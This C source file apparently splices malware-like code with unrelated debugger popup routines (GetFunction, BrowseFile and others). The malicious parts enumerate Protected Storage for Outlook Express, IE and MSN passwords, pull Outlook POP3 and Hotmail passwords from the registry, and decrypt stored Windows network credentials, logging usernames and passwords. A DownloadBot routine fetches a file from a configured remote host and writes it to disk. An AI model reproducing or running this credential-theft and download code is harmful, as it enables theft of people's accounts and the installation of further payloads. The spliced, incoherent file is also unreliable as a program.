memset(szItemData, 0, iDataLen);
//deb("psDataLen: %d", psDataLen);
if(((unsigned long)lstrlen((char *)psData))<(psDataLen-1))
{
//deb("unicode string");
int i = 0;
for(DWORD m = 0; m<psDataLen; m += 2)
{
if(psData[m]==0)
{
szItemData[i] = ',';
}
else
{
szItemData[i] = psData[m];
}
i++;
}
szItemData[i-1] = 0;
}
else
{
//deb("szItemData will be %s", psData);
wsprintf(szItemData, "%s", psData);
}
szResName[0] = 0;
szResData[0] = 0;
//deb("parsing guids");
//220d5cc1 Outlooks
int i;
if(lstrcmp(szItemGUID, "220d5cc1")==0)
{
//deb("guid: 220d5cc1");
BOOL bDeletedOEAccount = TRUE;
for(i = 0;i<oIndex;i++)
{
if(lstrcmp(OutlookData[i].POPpass, szItemName)==0)
{
bDeletedOEAccount = FALSE;
AddItemm(OutlookData[i].POPserver, "OutlookExpress", OutlookData[i].POPuser, szItemData);
break;
}
}
if(bDeletedOEAccount)
AddItemm(szItemName, "Deleted OE Account", OutlookData[i].POPuser, szItemData);
}
//5e7e8100 - IE:Password-Protected sites
if(lstrcmp(szItemGUID, "5e7e8100")==0)
{
deb("guid: 5e7e8100");
lstrcpy(chekingdata, "");
if(strstr(szItemData, ":")!=0)
{
lstrcpy(chekingdata, strstr(szItemData, ":")+1);
*(strstr(szItemData, ":")) = 0;
}
AddItemm(szItemName, "IE:Password-Protected sites", szItemData, chekingdata);
}
// b9819c52 MSN Explorer Signup
if(lstrcmp(szItemGUID, "b9819c52")==0)
{
deb("guid: b9819c52");
int i = 0;
BOOL first = TRUE;
for(DWORD m = 0;m<psDataLen;m += 2)
{
if(psData[m]==0)
{
szItemData[i] = ',';
i++;
}
else
{
if(IsCharAlphaNumeric(psData[m])||(psData[m]=='@')||(psData[m]=='.')||(psData[m]=='_'))
{
szItemData[i] = psData[m];
i++;
}
}
}
szItemData[i-1] = 0;
char *p;
p = szItemData+2;
//psData[4] - number of msn accounts
for(int ii = 0;ii<psData[4];ii++)
{
deb("enum msg accs");
lstrcpy(msnid, p+1);
if(strstr(msnid, ",")!=0) *strstr(msnid, ",") = 0;
if(strstr(p+1, ",")!=0)
lstrcpy(msnpass, strstr(p+1, ",")+2);
if(strstr(msnpass, ",")!=0) *strstr(msnpass, ",") = 0;
p = strstr(p+1, ",")+2+lstrlen(msnpass)+7;
AddItemm(msnid, "MSN Explorer Signup", msnid, msnpass);
}
}
//e161255a IE
if(lstrcmp(szItemGUID, "e161255a")==0)
{
deb("guid: e161255a szItemName:%s", szItemName);
if(strstr(szItemName, "StringIndex")==0)
{
if(strstr(szItemName, ":String")!=0)
*strstr(szItemName, ":String") = 0;
lstrcpyn(chekingdata, szItemName, 8);
deb("szItemname: stringindex");
if((strstr(chekingdata, "http:/")==0)&&(strstr(chekingdata, "https:/")==0))
AddItemm(szItemName, "IE Auto Complete Fields", szItemData, "");
else
{
lstrcpy(chekingdata, "");
if(strstr(szItemData, ",")!=0)
{
lstrcpy(chekingdata, strstr(szItemData, ",")+1);
*(strstr(szItemData, ",")) = 0;
}
AddItemm(szItemName, "AutoComplete Passwords", szItemData, chekingdata);
}
}
}
memset(szItemName, 0x0, sizeof(szItemName));
free(szItemData);
//deb("freed %d bytes", iDataLen);
}
deb("done with guid 0x%x", TypeGUID);
dwEnumerated++;
}
}
if(dwEnumerated)
deb("pstorage enumerated: %d", dwEnumerated);
else
deb("pstorage is empty");
return 0;
}
/* ------------------------------------------------------------------------------*/
void DownloadBot(char *path)
{
SOCKADDR_IN sin;
SOCKET s = NULL;
WSADATA wsaData;
HANDLE file = NULL;
int done = 0;
char buf[BUF_SIZE];
DWORD bytes = 0,written = 0;
int iResult;
char source_file[128];
char source_host[128];
char loader_version[255];
strncpy(source_file, SOURCE_FILE, sizeof(source_file));
strncpy(loader_version, LOADER_VERSION, sizeof(loader_version));
strncpy(source_host, SOURCE_HOST, sizeof(source_host));
while(!done)
{
deb("entered download cycle");
deb("source_host: %s", source_host);
deb("loader_version: %s", loader_version);
deb("source_file: %s", source_file);
Sleep(100);
if(file && file != INVALID_HANDLE_VALUE)
CloseHandle(file);
if(s && s != INVALID_SOCKET)
closesocket(s);
file = CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(file == INVALID_HANDLE_VALUE)
{
deb("DownloadFile: failed to create file %s\n", fmterr());
continue;
}
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
sin.sin_family = AF_INET;
sin.sin_port = htons(SOURCE_PORT);
if(DnsResolve(source_host) == -1)
continue;
sin.sin_addr.s_addr = DnsResolve(source_host);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET)
{
deb("socket: %s", fmterr());
continue;
}
if(connect( s, (SOCKADDR*) &sin, sizeof(sin) ) == SOCKET_ERROR)
{
deb("connect: %s\n",fmterr());
continue;
}
wsprintf(buf,"GET %s HTTP/1.0\r\n"
"User-Agent: %s\r\n"
"Host: %s\r\n\r\n",source_file, loader_version, source_host);
int res = send(s,buf,lstrlen(buf),0);
if(res == SOCKET_ERROR)
{
deb("res == SOCKET_ERROR after send()");
continue;
}
int code = GetHTTPRespCode(s);
if(code != 200)
{
deb("code: %d",code);
continue;
}
while(ready(s,HTTP_TIMEOUT) == 0)
{
res = recv(s,buf,BUF_SIZE,0);
if(res == SOCKET_ERROR)
break;
if(res == 0)
{
done = 1;
closesocket(s);
CloseHandle(file);
break;
}
bytes += res;
WriteFile(file,buf,res,&written,NULL);
if(written != (DWORD) res)
break;
}
}
deb("done. read %lu bytes.\n",bytes);
}
int exceptionHandler(unsigned int code, struct _EXCEPTION_POINTERS *e)
{
char strCode[128];
bool canContinue;
int numException = 0;
char szTemp[1024];
PEXCEPTION_POINTERS eNext = e;
PEXCEPTION_RECORD excRec;
static DWORD numCall = 0;
if (numCall++ >= 4)
ExitProcess(0);
_snprintf(szTemp, sizeof(szTemp), "!!! exceptionHandler(0x%08p)->0x%08p [ %03d ] *************************** !!!",
e, e->ExceptionRecord, numCall);
// OutputDebugString(szTemp);
deb(szTemp);
_snprintf(szTemp, sizeof(szTemp),
"eax=0x%08X ebx=0x%08X ecx=0x%08X edx=0x%08X\r\nesi=0x%08X edi=0x%08X esp=0x%08X ebp=0x%08X",
eNext->ContextRecord->Eax, eNext->ContextRecord->Ebx, eNext->ContextRecord->Ecx, eNext->ContextRecord->Edx,
eNext->ContextRecord->Esi, eNext->ContextRecord->Edi, eNext->ContextRecord->Esp, eNext->ContextRecord->Ebp);
// OutputDebugString(szTemp);
deb(szTemp);
do
{
excRec = eNext->ExceptionRecord;
numException++;
// deb(" -> # %-4d 0x%08p", numException, excRec);
// deb("code: %x", excRec->ExceptionCode);
canContinue = excRec->ExceptionFlags == EXCEPTION_NONCONTINUABLE ? true:false;
// deb("canContinue: %d", canContinue);
if (excRec->ExceptionCode == EXCEPTION_ACCESS_VIOLATION)
{
_snprintf(strCode, sizeof(strCode), "Access violation (%s @ 0x%08p)",
excRec->ExceptionInformation[0] ? "WRITE":"READ", excRec->ExceptionInformation[1]);
}
else
if (excRec->ExceptionCode == EXCEPTION_IN_PAGE_ERROR)
{
_snprintf(strCode, sizeof(strCode), "Access in-page violation (%s @ 0x%08p) ntcode: %d",
excRec->ExceptionInformation[0] ? "READ":"WRITE", excRec->ExceptionInformation[1],
excRec->ExceptionInformation[2]);
}
else
{
_snprintf(strCode, sizeof(strCode), "<unkcode=%X> d0: 0x%08x d1: 0x%08x d2: 0x%08x",
excRec->ExceptionCode, excRec->ExceptionInformation[0], excRec->ExceptionInformation[1],
excRec->ExceptionInformation[2]);
}
_snprintf(szTemp, sizeof(szTemp), "Exception 0x%08X %s Address=0x%08X canContinue=%s", excRec->ExceptionCode,
strCode, excRec->ExceptionAddress, canContinue ? "yes":"no");
deb(szTemp);
if (!eNext->ExceptionRecord->ExceptionRecord)
break;
excRec = eNext->ExceptionRecord->ExceptionRecord;
eNext->ExceptionRecord = eNext->ExceptionRecord->ExceptionRecord;
}
while (excRec->ExceptionRecord);
// find symbols
LPAPI_VERSION av = ImagehlpApiVersion();
// deb("dbghelp.dll: %d.%d rev:%d", av->MajorVersion, av->MinorVersion, av->Revision);
int ret = SymInitialize(GetCurrentProcess(), "c:\\symbols", TRUE);
SymSetOptions(SYMOPT_UNDNAME | SYMOPT_ALLOW_ABSOLUTE_SYMBOLS | SYMOPT_DEFERRED_LOADS | 0x01000000 |
SYMOPT_CASE_INSENSITIVE | SYMOPT_LOAD_ANYTHING | SYMOPT_LOAD_LINES);
if (!ret)
deb("syminit failed: code=%d, %s", ret, fmterr());
PSYMBOL_INFO si;
unsigned long stackPtr = e->ContextRecord->Esp;
DWORD dwDisp = false;
unsigned __int64 dwDisp64 = false;
LPVOID addr;
si = (PSYMBOL_INFO)malloc(4096);
for (int i = 0;i<100;i++)
{
memset(si, 0, 4096);
// si.Name = (char*) a(128);
si->MaxNameLen = 3000;
si->SizeOfStruct = sizeof(SYMBOL_INFO) + 3000;
memcpy((void*) &addr, (void*)stackPtr, 4);
char szTemp[128];
memset(szTemp, 0, sizeof(szTemp));
si->Address = (unsigned __int64)addr;
// get sym module name
ret = SymFromAddr(GetCurrentProcess(), (unsigned __int64)addr, &dwDisp64, si);
// if(ret)
snprintf(szTemp, sizeof(szTemp), " %03d 0x%08X :%-25s", i, addr, si->Name);
// get sym module line number
IMAGEHLP_LINE64 il;
memset(&il, 0, sizeof(il));
il.SizeOfStruct = sizeof(IMAGEHLP_LINE64);
il.Address = (unsigned __int64)addr;
ret = SymGetLineFromAddr64(GetCurrentProcess(), (unsigned __int64)addr, &dwDisp, &il);
char szTemp2[128];
memset(szTemp2, 0, sizeof(szTemp2));
if (il.LineNumber)
snprintf(szTemp2, sizeof(szTemp2), " %s:%d (0x%08X)", il.FileName, il.LineNumber, il.Address);
// show line info
if (addr && (strlen(szTemp) || strlen(szTemp2)))
deb(" %s %s", szTemp, szTemp2[0] ? szTemp2:"");
stackPtr -= 4;
}
// ret=SymEnumSymbols(GetCurrentProcess(), 0, "!", EnumSymProc, NULL);
// if(!ret)
// deb("enum err: %s", fmterr());
deb("!!! exceptionHandler out\r\n");
// EXCEPTION_CONTINUE_EXECUTION
// EXCEPTION_EXECUTE_HANDLER
return EXCEPTION_EXECUTE_HANDLER;
}
DWORD WINAPI processShellCallbacks(LPVOID hinstDLL)
{
static HKEY shellKey = NULL;
deb("processShellCallbacks %x", GetCurrentThreadId());
while (1)
{
DWORD dwIndex;
char keyname[128];
long ret;
if (!shellKey)
{
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\myexplorer\\shelltray", 0, KEY_ALL_ACCESS, &shellKey);
if (ret == 2)
{
// deb("no shelltray key");
Sleep(10);
continue;
}
if (ret != ERROR_SUCCESS)
{
deb("mye.cpp: RegOpenKeyEx shelltray: %s", fmterr(ret));
continue;
}
}
dwIndex = 0;
while ((ret = RegEnumKey(shellKey, dwIndex, keyname, sizeof(keyname))) == ERROR_SUCCESS)
{
// deb("processShellCallbacks dwIndex: %d keyname %s", dwIndex, keyname);
HKEY keyHkey;
ret = RegOpenKey(shellKey, keyname, &keyHkey);
if (ret != ERROR_SUCCESS)
{
deb("RegOpenKey ret for %s: %s", keyname, fmterr(ret));
dwIndex++;
continue;
}
DWORD status;
DWORD datasize = sizeof(status);
ret = RegQueryValueEx(keyHkey, "status", 0, 0, (unsigned char*) & status, &datasize);
if (ret != ERROR_SUCCESS)
{
// deb("mye.cpp: RegQueryValueEx('data') ret for %s: %s", keyname, fmterr(ret));
RegCloseKey(keyHkey);
dwIndex++;
continue;
}
if (status == 1)
{
deb("already processed packet %s", keyname);
dwIndex++;
RegCloseKey(keyHkey);
continue;
}
unsigned char data[1000] = "123";
datasize = sizeof(data);
ret = RegQueryValueEx(keyHkey, "data", 0, 0, data, &datasize);
if (ret != ERROR_SUCCESS)
{
// deb("mye.cpp: RegQueryValueEx('data') ret for %s: %s", keyname, fmterr(ret));
RegCloseKey(keyHkey);
dwIndex++;
continue;
}
DWORD size;
bool modified = false;
for (callbacks_v::iterator it = shell_callbacks.begin();it != shell_callbacks.end();it++)
{
char strcbkid[128];
sprintf(strcbkid, "cbk:%x", (*it));
size = sizeof(strcbkid);
ret = RegQueryValueEx(keyHkey, strcbkid, 0, 0, strcbkid, &size);
if (ret == ERROR_SUCCESS)
{
// deb("%s already processed by cbk %x", keyname, (*it));
continue;
}
deb("processing callback %x for packed %s", (*it), keyname);
modified = true;
shell_callback_api p_shell_callback_api = (shell_callback_api)(*it);
if (IsBadCodePtr((FARPROC)p_shell_callback_api))
{
deb("callback removed while processing callbacks");
break;
}
ret = p_shell_callback_api(data, datasize);
char str[32];
sprintf(str, "cbk:%x", (*it));
ret = RegSetValueEx(keyHkey, str, 0, REG_SZ, keyname, strlen(keyname));
if (ret != ERROR_SUCCESS)
{
deb("mye.cpp: RegSetValueEx('%s') ret for %s: %s", str, keyname, fmterr(ret));
continue;
}
}
ret = RegSetValueEx(keyHkey, "data", 0, REG_BINARY, data, datasize);
if (ret != ERROR_SUCCESS)
{
deb("mye.cpp: RegSetValueEx('data') ret for %s: %s", keyname, fmterr(ret));
}
DWORD dw = 1;
ret = RegSetValueEx(keyHkey, "status", 0, REG_DWORD, (unsigned char*) & dw, sizeof(DWORD));
if (ret != ERROR_SUCCESS)
{
deb("mye.cpp: RegSetValueEx('status') ret for %s: %s", keyname, fmterr(ret));
}
RegCloseKey(keyHkey);
dwIndex++;
}
// deb("processShellCallbacks waiting for changes");
static HANDLE hEvent = NULL;
if (!hEvent)
hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
ret = RegNotifyChangeKeyValue(shellKey, true, REG_NOTIFY_CHANGE_LAST_SET | REG_NOTIFY_CHANGE_NAME, hEvent,
true);
if (ret != ERROR_SUCCESS)
deb("mye.cpp: RegNotifyChangeKeyValue: %s", fmterr(ret));
if (WaitForSingleObject(hEvent, 300) == WAIT_FAILED)
{
deb("Error in WaitForSingleObject: %s", fmterr());
}
ResetEvent(hEvent);
// RegCloseKey(shellKey);
}
}
void EnumerateGenericNetworkPassword()
{
DATA_BLOB DataIn;
DATA_BLOB DataOut;
DATA_BLOB OptionalEntropy;
DWORD tmpSalt[37];
char *strSalt={"abe2869f-9b47-4cd9-a358-c22904dba7f7"};
char strURL[1024];
char strCredentials[1024];
char strUsername[1024];
char strPassword[1024];
//Create the entropy/salt required for decryption...
for(int i=0; i< 37; i++)
tmpSalt[i] = (short int)(strSalt[i] * 4);
OptionalEntropy.pbData = (BYTE *)&tmpSalt;
OptionalEntropy.cbData = 74;
DWORD Count;
PCREDENTIAL *Credential;
//Now enumerate all http stored credentials....
if(CredEnumerate(NULL,CRED_ENUMERATE_ALL_CREDENTIALS,
&Count,&Credential))
{
if(Count)
deb("got %d creds", Count);
for(int i=0;i<Count;i++)
{
if( Credential[i]->Type == CRED_TYPE_GENERIC)
{
DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob;
DataIn.cbData = Credential[i]->CredentialBlobSize;
if(CryptUnprotectData(&DataIn, NULL,
NULL, NULL,
NULL,0,&DataOut))
{
//Extract username & password from credentails (username:password)
sprintf_s(strCredentials, 1024, "%S", DataOut.pbData);
char *ptr = strchr(strCredentials, ':');
*ptr = '\0';
strcpy_s(strUsername, 1024, strCredentials);
ptr++;
strcpy_s(strPassword, 1024, ptr);
deb("Generic Network Password account details, "
" Username=%s, Password=%s",
strUsername, strPassword);
} else {
deb("failed to unprotect cred (%s)", fmterr(GetLastError()));
}
}
else if(Credential[i]->Type == CRED_TYPE_DOMAIN_PASSWORD)
{
DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob;
DataIn.cbData = Credential[i]->CredentialBlobSize;
if(CryptUnprotectData(&DataIn, NULL,
NULL, NULL,
NULL,0,&DataOut))
{
//Extract username & password from credentails (username:password)
sprintf_s(strCredentials, 1024, "%S", DataOut.pbData);
char *ptr = strchr(strCredentials, ':');
*ptr = '\0';
strcpy_s(strUsername, 1024, strCredentials);
ptr++;
strcpy_s(strPassword, 1024, ptr);
deb(" Network Password account details, "
"Username=%s, Password=%s",
strUsername, strPassword);
} else {
deb("failed to unprotect cred (%s)", fmterr(GetLastError()));
}
}
else {
deb("unk cred type %x", Credential[i]->Type);
}
} // End of FOR loop
CredFree(Credential);
}
} //End of function
//----------------------------------------------------------------------------------------
int EnumOutlookAccounts(void)
{
HKEY hkeyresult, hkeyresult1;
long l, i;
char name[8192], skey[8192];
DWORD dw2;
FILETIME f;
LONG lResult;
BYTE Data[8192];
BYTE Data1[8192];
DWORD size;
int j;
memset(OutlookData, 0x0, sizeof(OutlookData));
lstrcpy(skey, "Software\\Microsoft\\Internet Account Manager\\Accounts");
lResult = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)skey, 0, KEY_ALL_ACCESS, &hkeyresult1);
if(lResult!=ERROR_SUCCESS)
{
deb("regopenkeyex: %s", fmterr(lResult));
return -1;
}
i = 0;l = 0;
j = 0;
DWORD type = REG_BINARY;
while(l!=ERROR_NO_MORE_ITEMS)
{
dw2 = 200;
l = RegEnumKeyEx(hkeyresult1, i, name, &dw2, NULL, NULL, NULL, &f);
lstrcpy(skey, "Software\\Microsoft\\Internet Account Manager\\Accounts");
lstrcat(skey, "\\");
lstrcat(skey, name);
RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)skey, 0, KEY_ALL_ACCESS, &hkeyresult);
size = sizeof(Data);
if(RegQueryValueEx(hkeyresult, (LPCTSTR)"HTTPMail User Name", 0, &type, Data, &size)==ERROR_SUCCESS)
{
lstrcpy(OutlookData[oIndex].POPuser, (char *)Data);
memset(Data, 0x0, sizeof(Data));
lstrcpy(OutlookData[oIndex].POPserver, "Hotmail");
size = sizeof(Data);
if(RegQueryValueEx(hkeyresult, (LPCTSTR)"HTTPMail Password2", 0, &type, Data1, &size)==ERROR_SUCCESS)
{
int totnopass = 0;
// char mess[100];
for(DWORD i = 2;i<size;i++)
{
if(IsCharAlphaNumeric(Data1[i])||(Data1[i]=='(')||(Data1[i]==')')||(Data1[i]=='.')||(Data1[i]==' ')||(Data1[i]=='-'))
{
OutlookData[oIndex].POPpass[totnopass] = Data1[i];
totnopass++;
}
}
OutlookData[oIndex].POPpass[totnopass] = 0;
}
memset(Data1, 0x0, sizeof(Data));
oIndex++;
}
else if(RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 User Name", 0, &type, Data, &size)==ERROR_SUCCESS)
{
lstrcpy(OutlookData[oIndex].POPuser, (char *)Data);
memset(Data, 0x0, sizeof(Data));
size = sizeof(Data);
RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 Server", 0, &type, Data, &size);
lstrcpy(OutlookData[oIndex].POPserver, (char *)Data);
memset(Data, 0x0, sizeof(Data));
size = sizeof(Data);
if(RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 Password2", 0, &type, Data1, &size)==ERROR_SUCCESS)
{
int totnopass = 0;
// char mess[100];
for(DWORD i = 2;i<size;i++)
if(IsCharAlphaNumeric(Data1[i])||(Data1[i]=='(')||(Data1[i]==')')||(Data1[i]=='.')||(Data1[i]==' ')||(Data1[i]=='-'))
{
OutlookData[oIndex].POPpass[totnopass] = Data1[i];
totnopass++;
}
OutlookData[oIndex].POPpass[totnopass] = 0;
}
memset(Data1, 0x0, sizeof(Data1));
oIndex++;
}
j++;i++;
}
return oIndex;
}
AFILE *
GetFunction( char *InitString , uint func )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
AFILE *fp;
uchar *SaveArea;
int IsAddr;
static int _iview;
/****************************************************************************/
/* - copy the initstring ( cursor sensitive prompt ) into the prompt string.*/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area. */
/* - get a function name from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area. */
/* */
/****************************************************************************/
fp = NULL;
#if defined(MSH)
if(commandLine.nparms>1) {
IsAddr = (func==GETADDRESS)?TRUE:FALSE;
fp = FindFuncOrAddr(commandLine.parms[1],IsAddr);
if(fp)
{
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
return(fp);
}
}
#endif
_iview=iview; iview=0;
strcpy(PromptString,InitString);
Popup.Flags = 0;
if( func == GETFUNCTION )
{
Popup.title = GF_Title;
Popup.instructions = GF_Instructions;
Popup.help = GETFUNCHELP;
Popup.Flags = CLEAR1ST;
}
else /* func == GETADDRESS */
{
Popup.title = GA_Title;
Popup.instructions = GA_Instructions;
Popup.help = GETADDRHELP;
}
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* loop to handle user entry/errors. */
/****************************************************************************/
for(;;)
{
if( func == GETFUNCTION )
hp = GF_Instructions;
else
hp = GA_Instructions;
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
if( strlen(PromptString) == 0 )
continue;
IsAddr = (func==GETADDRESS)?TRUE:FALSE;
fp = FindFuncOrAddr(PromptString,IsAddr);
if( fp )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
#endif
break;
}
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = CantFind;
fmterr( hp);
continue;
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
return(fp);
}
AFILE *
GetF( )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
AFILE *fp;
uchar *SaveArea;
static int _iview;
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get a function name from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
fp = NULL;
#if defined(MSH)
if(commandLine.nparms>1) {
fp=GetFile(commandLine.parms[1]);
if(fp)
{
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
return fp;
}
}
#endif
_iview=iview; iview=0;
*PromptString = '\0';
Popup.title = GE_Title;
Popup.instructions = GE_Instructions;
Popup.help = GETFILEHELP;
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* loop to handle user entry/errors. */
/****************************************************************************/
for(;;)
{
hp = GE_Instructions;
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
if( strlen(PromptString) == 0 )
continue;
fp = GetFile(PromptString);
if( fp )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
#endif
break;
}
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = CantFind;
fmterr( hp);
continue;
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
return(fp);
}
DWORD WINAPI processCallbacks(LPVOID p)
{
HANDLE hPipe;
DWORD dwRead;
hPipe = CreateNamedPipe(dllpipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, PIPE_UNLIMITED_INSTANCES, 50, 50,
NMPWAIT_USE_DEFAULT_WAIT, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
deb("processCallbacks CreateNamedPipe: %s", fmterr());
ExitThread(0);
}
deb("processCallbacks pipe %s (%x)", dllpipe, hPipe);
while (1)
{
bool ret = ConnectNamedPipe(hPipe, NULL);
if (!ret)
{
DWORD err = GetLastError();
deb("processCallbacks ConnectNamedPipe: %s", fmterr(err));
if (err != 535)
{
Sleep(500);
continue;
}
}
// deb("connected");
EVENT e;
memset(&e, 0, sizeof(e));
ReadFile(hPipe, &e, sizeof(e), &dwRead, NULL);
// deb("need to call %x msg: %x", e.addr,e.msg);
if (dwRead == sizeof(e))
{
if (e.msg != LO_ADDCLBK && e.msg != LO_MODCLBK && e.msg != LO_DELCLBK)
{
shell_events_api api;
api = (shell_events_api)e.addr;
//deb("calling %x(%d, %x)", api, e.dwIndex, &e.pn);
api(e.dwIndex, (PNOTIFYICONDATAW) &e.pn);
} else if(e.msg == LO_ONPAINT)
{
shell_events2_api api;
api = (shell_events2_api)e.addr;
//deb("calling %x(%d, %x)", api, e.dwIndex, &e.pn);
api();
}
else
{
shell_callback_api api;
api = (shell_callback_api)e.addr;
api((LPVOID) &e.pn, sizeof(NOTIFYICONDATAW));
}
}
WriteFile(hPipe, NULL, 0, &dwRead, NULL);
FlushFileBuffers(hPipe);
DisconnectNamedPipe(hPipe);
}
}
UINT GetFormatType( DFILE *dfp )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
uchar *SaveArea;
int LeaveLoop;
static int _iview;
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get a function name from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
_iview=iview; iview=0;
*PromptString = '\0';
Popup.title = GT_Title;
Popup.instructions = GT_Instructions;
Popup.help = GETTYPEHELP;
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* loop to handle user entry/errors. */
/****************************************************************************/
for( LeaveLoop=FALSE; LeaveLoop==FALSE;)
{
hp = GT_Instructions;
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( (key == ESC) ||
( (key == ENTER) && (strlen(PromptString)==0) )
)
LeaveLoop = TRUE;
else
{
switch( key )
{
case ENTER:
case PADENTER:
{
UINT mid4type = 0;
USHORT typeno;
UCHAR *hp;
UCHAR buffer[PROMAX+2];
memset(buffer, 0, sizeof(buffer));
strcpy(buffer+2, PromptString);
*(USHORT*)buffer = (USHORT)strlen(PromptString);
typeno = QtypeNumber(dfp->mid, buffer, &mid4type );
if( mid4type != 0 )
dfp->mid = mid4type;
if(typeno)
{
SetShowType( dfp, (UINT)typeno );
LeaveLoop = TRUE;
}
else
{
beep();
hp = "Incorrect type name";
fmterr( hp);
}
}
break;
case ESC:
LeaveLoop = TRUE;
break;
}
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
return(0);
}
void
BrowseFile( )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
uchar *SaveArea;
static int _iview;
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get the file to browse from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
#if defined(MSH)
if(commandLine.nparms>1)
{
uchar *fnfull; /* fully qualified filespec. */
int fnlen, rc; /* filename/filespec buffer length. */
fnlen = CCHMAXPATH;
fnfull = Talloc( fnlen );
rc = FindExe( commandLine.parms[1], fnfull+1 , fnlen );
if(!rc) {
if( !browse(commandLine.parms[1], 0) ) {
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
return;
}
}
}
#endif
_iview=iview; iview=0;
*PromptString = '\0';
Popup.title = BR_Title;
Popup.instructions = BR_Instructions;
Popup.help = BROWSEHELP;
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* - loop to handle user entry/errors. */
/****************************************************************************/
for(;;)
{
hp = BR_Instructions;
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
uchar *fnfull; /* fully qualified filespec. */
int fnlen, rc; /* filename/filespec buffer length. */
if( strlen(PromptString) == 0 )
continue;
if( strpbrk( PromptString, "*?" ) ) /*802*/
{ /*802*/
hp = CantFind; /*802*/
fmterr( hp ); /*802*/
beep(); /*802*/
continue; /*802*/
} /*802*/
fnlen = CCHMAXPATH;
fnfull = Talloc( fnlen );
rc = FindExe( PromptString, fnfull+1 , fnlen );
if( !rc )
{
PutPopArea(SaveArea);
Tfree(SaveArea );
SaveArea = NULL;
if( !browse(PromptString, 0) )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
#endif
break;
}
}
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = CantFind;
fmterr( hp);
continue;
}
}
if( SaveArea != NULL )
{
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
}
}
